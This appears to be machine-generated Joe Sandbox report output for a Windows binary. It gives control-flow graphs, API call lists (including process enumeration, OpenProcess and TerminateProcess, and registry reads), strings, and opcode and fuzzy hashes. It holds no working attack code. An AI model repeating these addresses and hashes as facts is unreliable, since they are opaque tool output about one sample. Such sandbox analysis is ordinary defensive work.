                                control_flow_graph 251 3fea40-3fea56 252 3fea88-3fea8e 251->252 253 3fea58-3fea5d 251->253 254 3feb8d call 3e2130 252->254 255 3fea94-3fea9f 252->255 256 3fea5f 253->256 257 3fea61-3fea66 253->257 263 3feb92-3fec17 call 4291af 254->263 261 3feaad-3feaba 255->261 262 3feaa1-3feaab 255->262 256->257 259 3fea68-3fea74 257->259 260 3fea77-3fea85 257->260 259->260 265 3feabc-3feac6 261->265 266 3feac8-3fead8 261->266 264 3feae7-3feaec 262->264 281 3fec1d-3fec20 263->281 282 3ff0b0-3ff0bf 263->282 269 3feb88 call 3e2090 264->269 270 3feaf2-3feafd call 42571f 264->270 265->264 268 3feade-3feae5 266->268 266->269 268->264 272 3feb0e-3feb10 268->272 269->254 270->263 283 3feb03-3feb0c 270->283 277 3feb1f 272->277 278 3feb12-3feb1d call 42571f 272->278 280 3feb21-3feb2c 277->280 278->280 286 3feb2e-3feb3a 280->286 287 3feb3d-3feb49 280->287 288 3fec34 281->288 289 3fec22-3fec32 281->289 285 3ff092-3ff0af call 425711 282->285 283->280 286->287 290 3feb7b-3feb85 287->290 291 3feb4b-3feb5a 287->291 292 3fec3e-3fec46 288->292 289->288 289->292 294 3feb6e-3feb78 call 4259a5 291->294 295 3feb5c-3feb6a 291->295 296 3fec4c-3fec5c 292->296 297 3ff0c1 292->297 294->290 295->263 300 3feb6c 295->300 302 3fec5e-3fec65 call 400980 296->302 303 3fec79-3fecaf call 3e21d0 296->303 299 3ff0c8-3ff0db 297->299 300->294 311 3fec67-3fec6e 302->311 312 3fec73 302->312 309 3fecb5-3fecbb 303->309 310 3fecb1-3fecb3 303->310 313 3fecbf-3fecef GetFileVersionInfoSizeExW 309->313 310->309 310->313 311->299 312->303 314 3fecf5-3fed2b call 3fe9d0 GetFileVersionInfoExW 313->314 315 3ff0e0-3ff0fb GetLastError 313->315 318 3ff107-3ff122 GetLastError 314->318 319 3fed31-3fed55 call 3fe8b0 call 3e22e0 314->319 321 3ff12e call 4291af 318->321 328 3fed89-3feda1 319->328 329 3fed57-3fed69 319->329 325 3ff133-3ff146 call 3fa380 call 3f51a0 321->325 325->285 328->325 330 3feda7-3fede4 VerQueryValueW 328->330 332 3fed7f-3fed86 call 4259a5 329->332 333 3fed6b-3fed79 329->333 335 3ff1ad-3ff1c6 GetLastError call 3f51a0 330->335 336 3fedea-3fedf1 330->336 332->328 333->321 333->332 335->285 336->335 339 3fedf7-3fee02 336->339 342 3fee08-3fee0a 339->342 344 3ff009-3ff01d 342->344 345 3fee10-3fee19 342->345 346 3ff01f-3ff022 344->346 347 3ff062-3ff067 344->347 348 3fee1b-3fee1e 345->348 349 3fee24-3fee85 call 3fcf60 call 4000b0 345->349 350 3ff024-3ff02a 346->350 351 3ff071-3ff073 346->351 347->351 352 3ff069-3ff06d 347->352 348->349 353 3ff14b-3ff16a call 3feba0 348->353 372 3feeda-3feee2 349->372 373 3fee87-3feed5 GetLastError call 3ffaa0 call 3f51a0 call 3e22e0 349->373 350->351 355 3ff02c-3ff03e 350->355 351->285 352->351 364 3feffb-3ff004 353->364 365 3ff170-3ff185 call 3f51a0 353->365 358 3ff054-3ff060 call 4259a5 355->358 359 3ff040-3ff04e 355->359 358->285 359->358 362 3ff1a8 call 4291af 359->362 362->335 364->342 365->285 375 3ff18a-3ff196 372->375 376 3feee8-3fef0f 372->376 373->342 379 3ff19e call 4291af 375->379 378 3fef15-3fef1e 376->378 378->378 381 3fef20-3fef68 call 3e21d0 call 3ffaa0 378->381 385 3ff1a3 call 4291af 379->385 392 3fefab-3fefb0 381->392 393 3fef6a-3fef6d 381->393 385->362 395 3fefba-3fefc4 392->395 396 3fefb2-3fefb6 392->396 394 3fef6f-3fef75 393->394 393->395 394->395 397 3fef77-3fef89 394->397 395->364 398 3fefc6-3fefdb 395->398 396->395 399 3fef9f-3fefa9 call 4259a5 397->399 400 3fef8b-3fef99 397->400 401 3fefdd-3fefeb 398->401 402 3feff1-3feff8 call 4259a5 398->402 399->395 400->379 400->399 401->385 401->402 402->364
                                APIs
                                • Concurrency::cancel_current_task.LIBCPMT ref: 003FEB88
                                • GetFileVersionInfoSizeExW.KERNELBASE(00000001,00000000,?,?,?,A05DD77D,?), ref: 003FECE1
                                • GetFileVersionInfoExW.KERNELBASE(00000002,?,00000000,?,?,00000000), ref: 003FED23
                                • VerQueryValueW.KERNELBASE(?,\VarFileInfo\Translation,?,?,?), ref: 003FEDDC
                                • GetLastError.KERNEL32(?,?,?,00000000,00000000), ref: 003FEE87
                                Strings
                                • \StringFileInfo\%04x%04x\%ls, xrefs: 003FEE3F
                                • \VarFileInfo\Translation, xrefs: 003FEDD0
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FileInfoVersion$Concurrency::cancel_current_taskErrorLastQuerySizeValue
                                • String ID: \StringFileInfo\%04x%04x\%ls$\VarFileInfo\Translation
                                • API String ID: 1091494215-3503296632
                                • Opcode ID: 8669ef736f0aab023187125335c764e837a7c8c236bcc44f60cfec3558b1ac3c
                                • Instruction ID: b336c0b3fe0a2d6b113433204163dd2aa770c949e755940b739025a8975e39c8
                                • Opcode Fuzzy Hash: 8669ef736f0aab023187125335c764e837a7c8c236bcc44f60cfec3558b1ac3c
                                • Instruction Fuzzy Hash: 75129271A01219DFEF25DF68CC84BADB7B5BF44304F1082A9E909973A1DB749E44CB51

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 407 3ef54f-3ef564 408 3ef57a-3ef602 call 4259a5 call 3e23a0 call 3e21d0 call 3ef180 407->408 409 3ef566-3ef574 407->409 422 3ef608-3ef648 call 3e23a0 408->422 423 3ef6b7-3ef6be 408->423 409->408 410 3ef985-3ef98a call 4291af 409->410 422->423 435 3ef64a-3ef651 422->435 424 3ef6cf-3ef6ea K32EnumProcesses 423->424 425 3ef6c0-3ef6cc call 3ee7b0 423->425 428 3ef6ec-3ef6f9 424->428 429 3ef747-3ef78b call 3e23a0 424->429 425->424 433 3ef72d-3ef734 428->433 434 3ef6fb 428->434 444 3ef78d-3ef7b0 call 3f0780 429->444 445 3ef7c8-3ef800 call 3e23a0 429->445 440 3ef736-3ef742 call 3ee7b0 433->440 441 3ef745 433->441 437 3ef700-3ef709 434->437 438 3ef653-3ef664 call 3ee7b0 435->438 439 3ef6b0-3ef6b2 435->439 446 3ef70b-3ef71c call 3f5630 call 3fab50 437->446 447 3ef728-3ef72b 437->447 442 3ef929-3ef932 438->442 439->442 440->441 441->429 454 3ef934-3ef949 442->454 455 3ef965-3ef982 call 425711 442->455 463 3ef7bc-3ef7c2 444->463 464 3ef7b2-3ef7b7 444->464 467 3ef802-3ef825 call 3f0780 445->467 468 3ef831-3ef849 GetDC 445->468 473 3ef721-3ef726 446->473 447->433 447->437 456 3ef95b-3ef962 call 4259a5 454->456 457 3ef94b-3ef959 454->457 456->455 457->410 457->456 463->445 464->442 467->468 477 3ef827-3ef82c 467->477 470 3ef84b-3ef878 GetDeviceCaps * 2 ReleaseDC 468->470 471 3ef880-3ef8b5 call 439f00 call 3f14a0 468->471 470->471 481 3ef8c6-3ef924 GetDesktopWindow GetClientRect call 3ef990 471->481 482 3ef8b7-3ef8c3 call 3ee7b0 471->482 473->433 473->447 477->442 481->442 482->481
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID: /help$Local\{46C61DD2-00A3-46F1-B456-3E6CDCEF89B7}
                                • API String ID: 0-3953150669
                                • Opcode ID: 004089ab57447c5d832a4e6a176fb0750575af804b800db0c1c95334b16e47ef
                                • Instruction ID: af3ebfd3b28d50f7c9965284fda9c22b8880261752afbb94b0c3f2a4f791bf4a
                                • Opcode Fuzzy Hash: 004089ab57447c5d832a4e6a176fb0750575af804b800db0c1c95334b16e47ef
                                • Instruction Fuzzy Hash: CEA18871A002A4DFDB219F25ED4479E73B5AB08341F1006B9EA48A72E1E7F59EC0CF95

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 486 3e89a0-3e8a17 call 42deb1 489 3e8a2c-3e8a3e GetCurrentThread SetThreadPriority 486->489 490 3e8a19-3e8a28 GetCurrentThread SetThreadDescription 486->490 491 3e8a4f-3e8a99 call 3f5300 call 3ffe90 489->491 492 3e8a40-3e8a4c call 3ee7b0 489->492 490->489 499 3e8aa0-3e8aa2 491->499 492->491 500 3e8aa8-3e8aab 499->500 501 3e8c30-3e8c37 499->501 504 3e8f8a-3e8f91 500->504 505 3e8ab1 500->505 502 3e8c48-3e8c50 501->502 503 3e8c39-3e8c45 call 3ee7b0 501->503 507 3e8ca2-3e8ca7 502->507 508 3e8c52-3e8c5c 502->508 503->502 510 3e8f97-3e8f9e 504->510 511 3e8ab3-3e8ae1 call 3ffe90 call 4398d0 504->511 509 3e8afd-3e8b24 call 424cbf 505->509 512 3e8cbf-3e8cdc call 425711 507->512 513 3e8ca9-3e8cb1 GetCurrentThreadId 507->513 508->507 516 3e8c5e-3e8c65 508->516 530 3e904e-3e9055 509->530 531 3e8b2a-3e8b77 509->531 518 3e8fa0-3e8faf call 3ee7b0 510->518 519 3e8fb1-3e8fd5 call 424cbf call 424cdb 510->519 548 3e8aeb-3e8aed 511->548 549 3e8ae3-3e8ae5 511->549 513->512 521 3e8cb3-3e8cb7 513->521 524 3e8c76-3e8c90 516->524 525 3e8c67-3e8c73 call 3ee7b0 516->525 518->519 552 3e8fd7-3e8fd9 519->552 521->512 529 3e8cb9 521->529 550 3e8c9c 524->550 551 3e8c92-3e8c98 524->551 525->524 529->512 537 3e8b2c-3e8b60 call 3f6990 call 3f8b20 530->537 538 3e905b-3e906a call 3ee7b0 530->538 546 3e8b7d-3e8b82 531->546 547 3e8cf3-3e8cfa 531->547 577 3e906f-3e9077 call 424cdb 537->577 578 3e8b66 537->578 538->537 556 3e8b84-3e8ba2 546->556 557 3e8ba5-3e8bb6 546->557 547->546 555 3e8d00-3e8d05 547->555 548->509 559 3e8aef 548->559 549->548 558 3e902b-3e9034 call 3e90e0 549->558 550->507 551->550 552->501 560 3e8fdf-3e9029 call 3e7740 call 3f4cb0 call 3f4f20 552->560 555->546 562 3e8d0b-3e8d14 555->562 556->557 563 3e8bb8-3e8bc3 call 424cdb 557->563 564 3e8bc6-3e8bc8 557->564 574 3e9039-3e9049 call 3ffe90 558->574 559->558 566 3e8af5-3e8af7 559->566 560->552 571 3e8d16-3e8d20 562->571 572 3e8d22 562->572 563->564 567 3e8bce-3e8bdb call 3e9660 564->567 568 3e907c-3e9083 564->568 566->509 566->558 587 3e8ed5-3e8ede 567->587 591 3e8be1-3e8be8 567->591 568->567 579 3e9089-3e90a2 call 3ee7b0 568->579 580 3e8d25-3e8d36 call 4247d2 571->580 572->580 574->509 577->568 578->587 579->567 595 3e8d3c-3e8d41 580->595 596 3e90d2-3e90d8 call 424c11 580->596 587->499 597 3e8bea-3e8c00 call 3ee7b0 591->597 598 3e8c03-3e8c1a call 424cbf 591->598 600 3e90c8-3e90cd call 3e7260 595->600 601 3e8d47-3e8d4b 595->601 597->598 612 3e90a7-3e90ae 598->612 613 3e8c20-3e8dde 598->613 600->596 601->600 607 3e8d51-3e8d75 call 424cdb call 42397a 601->607 607->600 628 3e8d7b-3e8da4 call 4247f7 call 3f9e70 call 424cbf 607->628 616 3e90b4-3e90c3 call 3ee7b0 612->616 617 3e8c25-3e8c2d call 424cdb 612->617 619 3e8de1-3e8de7 613->619 616->617 617->501 624 3e8e1b-3e8e3d call 3f86e0 619->624 625 3e8de9-3e8def 619->625 635 3e8ec5-3e8ed2 call 424cdb 624->635 636 3e8e43-3e8e48 624->636 629 3e8e07-3e8e19 call 3f6af0 625->629 630 3e8df1-3e8e05 call 3f8a10 625->630 657 3e8daa-3e8db2 628->657 658 3e8cf0 628->658 629->619 630->619 635->587 640 3e8e4a-3e8e4f 636->640 641 3e8e51-3e8e53 636->641 640->636 640->641 641->635 644 3e8e55-3e8e5d 641->644 647 3e8e5f 644->647 648 3e8e85-3e8e87 644->648 650 3e8e60-3e8e65 647->650 648->635 651 3e8e89-3e8e91 648->651 653 3e8e78-3e8e80 650->653 654 3e8e67-3e8e75 call 3fa080 650->654 655 3e8eb2-3e8ec2 call 3f86e0 651->655 656 3e8e93-3e8eaa call 3fa080 651->656 653->650 664 3e8e82 653->664 654->653 655->635 668 3e8eac-3e8eaf 656->668 660 3e8db8-3e8dc6 657->660 661 3e8ce0-3e8ce7 657->661 658->547 660->661 670 3e8dcc-3e8dd3 660->670 661->658 664->648 668->655 670->661
                                APIs
                                • GetCurrentThread.KERNEL32 ref: 003E8A19
                                • SetThreadDescription.KERNELBASE(00000000,framework: com), ref: 003E8A25
                                  • Part of subcall function 003FFE90: QueryUnbiasedInterruptTimePrecise.KERNELBASE ref: 003FFEFD
                                  • Part of subcall function 00424CDB: RtlReleaseSRWLockExclusive.NTDLL(00000000), ref: 00424CE1
                                • GetCurrentThread.KERNEL32 ref: 003E8A2E
                                • SetThreadPriority.KERNEL32(00000000), ref: 003E8A31
                                • GetCurrentThreadId.KERNEL32 ref: 003E8CA9
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Thread$Current$DescriptionExclusiveInterruptLockPrecisePriorityQueryReleaseTimeUnbiased
                                • String ID: framework: com
                                • API String ID: 2759220540-887911046
                                • Opcode ID: cd12f6c1c50b136a562d81de8ef6fa4ed2cfc6d26b611a99fc7ea0c170ca464f
                                • Instruction ID: 8cc9fdffe6d7ca3b572714e937423f1f887e904dae2aeff675b00f4baa9aac51
                                • Opcode Fuzzy Hash: cd12f6c1c50b136a562d81de8ef6fa4ed2cfc6d26b611a99fc7ea0c170ca464f
                                • Instruction Fuzzy Hash: AB12E170E002A8DFDB16DFA9D840BADFBB1BF44304F154259E409AB2C1EB74AD54CB95

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 672 3feba0-3fec17 673 3fec1d-3fec20 672->673 674 3ff0b0-3ff0bf 672->674 676 3fec34 673->676 677 3fec22-3fec32 673->677 675 3ff092-3ff0af call 425711 674->675 678 3fec3e-3fec46 676->678 677->676 677->678 680 3fec4c-3fec5c 678->680 681 3ff0c1 678->681 684 3fec5e-3fec65 call 400980 680->684 685 3fec79-3fecaf call 3e21d0 680->685 683 3ff0c8-3ff0db 681->683 692 3fec67-3fec6e 684->692 693 3fec73 684->693 690 3fecb5-3fecbb 685->690 691 3fecb1-3fecb3 685->691 694 3fecbf-3fecef GetFileVersionInfoSizeExW 690->694 691->690 691->694 692->683 693->685 695 3fecf5-3fed2b call 3fe9d0 GetFileVersionInfoExW 694->695 696 3ff0e0-3ff0fb GetLastError 694->696 699 3ff107-3ff122 GetLastError 695->699 700 3fed31-3fed55 call 3fe8b0 call 3e22e0 695->700 702 3ff12e call 4291af 699->702 709 3fed89-3feda1 700->709 710 3fed57-3fed69 700->710 706 3ff133-3ff146 call 3fa380 call 3f51a0 702->706 706->675 709->706 711 3feda7-3fede4 VerQueryValueW 709->711 713 3fed7f-3fed86 call 4259a5 710->713 714 3fed6b-3fed79 710->714 716 3ff1ad-3ff1c6 GetLastError call 3f51a0 711->716 717 3fedea-3fedf1 711->717 713->709 714->702 714->713 716->675 717->716 720 3fedf7-3fee02 717->720 723 3fee08-3fee0a 720->723 725 3ff009-3ff01d 723->725 726 3fee10-3fee19 723->726 727 3ff01f-3ff022 725->727 728 3ff062-3ff067 725->728 729 3fee1b-3fee1e 726->729 730 3fee24-3fee85 call 3fcf60 call 4000b0 726->730 731 3ff024-3ff02a 727->731 732 3ff071-3ff073 727->732 728->732 733 3ff069-3ff06d 728->733 729->730 734 3ff14b-3ff16a call 3feba0 729->734 753 3feeda-3feee2 730->753 754 3fee87-3feed5 GetLastError call 3ffaa0 call 3f51a0 call 3e22e0 730->754 731->732 736 3ff02c-3ff03e 731->736 732->675 733->732 745 3feffb-3ff004 734->745 746 3ff170-3ff185 call 3f51a0 734->746 739 3ff054-3ff060 call 4259a5 736->739 740 3ff040-3ff04e 736->740 739->675 740->739 743 3ff1a8 call 4291af 740->743 743->716 745->723 746->675 756 3ff18a-3ff196 753->756 757 3feee8-3fef0f 753->757 754->723 760 3ff19e call 4291af 756->760 759 3fef15-3fef1e 757->759 759->759 762 3fef20-3fef68 call 3e21d0 call 3ffaa0 759->762 766 3ff1a3 call 4291af 760->766 773 3fefab-3fefb0 762->773 774 3fef6a-3fef6d 762->774 766->743 776 3fefba-3fefc4 773->776 777 3fefb2-3fefb6 773->777 775 3fef6f-3fef75 774->775 774->776 775->776 778 3fef77-3fef89 775->778 776->745 779 3fefc6-3fefdb 776->779 777->776 780 3fef9f-3fefa9 call 4259a5 778->780 781 3fef8b-3fef99 778->781 782 3fefdd-3fefeb 779->782 783 3feff1-3feff8 call 4259a5 779->783 780->776 781->760 781->780 782->766 782->783 783->745
                                Strings
                                • \StringFileInfo\%04x%04x\%ls, xrefs: 003FEE3F
                                • \VarFileInfo\Translation, xrefs: 003FEDD0
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID: \StringFileInfo\%04x%04x\%ls$\VarFileInfo\Translation
                                • API String ID: 0-3503296632
                                • Opcode ID: d6767061f4ae53069688626920be129685e99f0f60a18d6025c33425efacbd7d
                                • Instruction ID: 82d9677fc57a8b149719693decf11bffc7d35cea30364caaf0801e20eca7f89c
                                • Opcode Fuzzy Hash: d6767061f4ae53069688626920be129685e99f0f60a18d6025c33425efacbd7d
                                • Instruction Fuzzy Hash: 4CA13CB090125CDFEB25CF55CC44BAEBBB5FF44304F2081AAE909A7251EB749A48CF65

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 788 3f14a0-3f1503 GetDC 789 3f1505-3f153f GetDeviceCaps * 2 ReleaseDC 788->789 790 3f1541 788->790 791 3f1546-3f1598 KiUserCallbackDispatcher 789->791 790->791 792 3f159e-3f15c2 791->792 793 3f1710-3f1723 791->793 796 3f15de-3f15e5 792->796 797 3f15c4-3f15d9 792->797 794 3f1729-3f173d call 425d49 793->794 795 3f1806-3f1820 793->795 794->795 816 3f1743-3f1803 call 3f0f20 call 42598b call 425cff 794->816 798 3f1827-3f182f 795->798 799 3f1822-3f1825 795->799 801 3f161e-3f1623 796->801 802 3f15e7-3f160b call 3ee7b0 796->802 797->796 805 3f185a-3f1862 798->805 806 3f1831-3f1839 798->806 804 3f1855 799->804 807 3f163c-3f166b 801->807 808 3f1625-3f162a 801->808 802->801 819 3f160d-3f161b call 3ee7b0 802->819 804->805 817 3f1895-3f18c8 RegOpenKeyExW 805->817 818 3f1864-3f1891 805->818 811 3f184c-3f1850 806->811 812 3f183b-3f1848 806->812 814 3f166d-3f1694 807->814 815 3f16a7-3f16b4 807->815 808->793 813 3f1630-3f163a 808->813 811->805 821 3f1852 811->821 812->806 820 3f184a 812->820 813->814 814->815 822 3f1696-3f16a4 call 3ee7b0 814->822 824 3f16bc-3f16c1 815->824 825 3f16b6-3f16ba 815->825 816->795 826 3f193a 817->826 827 3f18ca-3f18f7 RegQueryValueExW 817->827 818->817 819->801 820->805 821->804 822->815 828 3f16dc-3f16e3 824->828 829 3f16c3 824->829 834 3f16c7-3f16d7 825->834 831 3f193f-3f1946 826->831 835 3f18f9-3f18fd 827->835 836 3f1931-3f1934 RegCloseKey 827->836 838 3f170c 828->838 839 3f16e5-3f1709 call 3ee7b0 828->839 829->834 841 3f196c-3f19a2 call 425711 831->841 842 3f1948-3f1969 call 3ee7b0 831->842 834->828 835->836 837 3f18ff-3f1905 835->837 836->826 837->826 845 3f1907-3f191f 837->845 838->793 839->838 842->841 851 3f1926-3f192f 845->851 852 3f1921-3f1924 845->852 851->831 852->831
                                APIs
                                • GetDC.USER32(00000000), ref: 003F14F8
                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 003F150E
                                • GetDeviceCaps.GDI32(?,0000005A), ref: 003F1517
                                • ReleaseDC.USER32(00000000,?), ref: 003F151E
                                • KiUserCallbackDispatcher.NTDLL(00000030,00000000,?,00000000), ref: 003F1590
                                • RegOpenKeyExW.KERNEL32(80000001,0046117C,00000000,00020019,?), ref: 003F18C0
                                • RegQueryValueExW.KERNEL32(?,004611DC,00000000,?,?,00000004), ref: 003F18EF
                                • RegCloseKey.KERNEL32(?), ref: 003F1934
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CapsDevice$CallbackCloseDispatcherOpenQueryReleaseUserValue
                                • String ID:
                                • API String ID: 3089890080-0
                                • Opcode ID: cf0f1ffc98257563f0574614c9dac9ac2ae39fc054a205cd9d96e9705e4fa5b7
                                • Instruction ID: 9eb8cddb622da181a9d565fdb7695f28ef1b3aa697f471e761f0fca471965602
                                • Opcode Fuzzy Hash: cf0f1ffc98257563f0574614c9dac9ac2ae39fc054a205cd9d96e9705e4fa5b7
                                • Instruction Fuzzy Hash: 4CE1D271D10B4CDADB13DF74D8417AEB7B9BF2A781F14832AF90576162FB7068828A44

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 857 3fab50-3fabe5 call 4279a0 OpenProcess 860 3faf0c-3faf12 857->860 861 3fabeb-3fac10 K32EnumProcessModules 857->861 862 3faf14-3faf26 860->862 863 3faf42-3faf61 call 425711 860->863 864 3fac16-3fac36 K32GetModuleBaseNameW 861->864 865 3faf00-3faf06 FindCloseChangeNotification 861->865 866 3faf38-3faf3f call 4259a5 862->866 867 3faf28-3faf36 862->867 864->865 869 3fac3c-3fac64 864->869 865->860 866->863 867->866 870 3faf67-3faf6f call 4291af 867->870 873 3fac67-3fac70 869->873 873->873 875 3fac72-3facac call 3e21d0 873->875 880 3facae-3facb9 875->880 881 3facbb-3facc4 875->881 882 3facc6-3facce 880->882 881->882 883 3fad07-3fad1d 882->883 884 3facd0-3facd8 882->884 886 3fad20-3fad29 883->886 885 3face0-3facf9 call 42e03b 884->885 891 3facfb-3fad01 885->891 886->886 888 3fad2b-3fad57 call 3e2430 886->888 893 3fad5d-3fad63 888->893 894 3faec4-3faecd 888->894 891->883 893->894 897 3fad69 893->897 895 3faecf-3faede 894->895 896 3faefa 894->896 899 3faef0-3faef7 call 4259a5 895->899 900 3faee0-3faeee 895->900 896->865 897->894 898 3fad6f-3fad7f TerminateProcess 897->898 901 3fae65-3fae7a WaitForSingleObject 898->901 902 3fad85-3fad8c 898->902 899->896 900->899 903 3faf62 call 4291af 900->903 906 3fae8c-3fae8e 901->906 907 3fae7c-3fae89 call 3ee7b0 901->907 908 3faebe 902->908 909 3fad92-3fad9d GetLastError 902->909 903->870 906->908 913 3fae90-3fae97 906->913 907->906 908->894 912 3fada0-3fadbe 909->912 912->912 915 3fadc0-3fade1 912->915 916 3fae99-3faeb1 call 3ee7b0 913->916 917 3faeb4 913->917 918 3fadfa-3fae2e call 3ee7b0 915->918 919 3fade3-3fadf4 call 3e21d0 915->919 916->917 917->908 918->908 926 3fae34-3fae43 918->926 919->918 927 3fae59-3fae63 call 4259a5 926->927 928 3fae45-3fae53 926->928 927->908 928->903 928->927
                                APIs
                                • OpenProcess.KERNEL32(001FFFFF,00000000,?,A05DD77D), ref: 003FABD7
                                • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,A05DD77D), ref: 003FAC08
                                • K32GetModuleBaseNameW.KERNEL32(?,?,?,00000104,?,A05DD77D), ref: 003FAC2E
                                • TerminateProcess.KERNEL32(?,00000000,?,A05DD77D), ref: 003FAD77
                                • GetLastError.KERNEL32(?,A05DD77D), ref: 003FAD92
                                • WaitForSingleObject.KERNEL32(?,0000EA60,?,A05DD77D), ref: 003FAE6B
                                • FindCloseChangeNotification.KERNEL32(?,?,A05DD77D), ref: 003FAF06
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
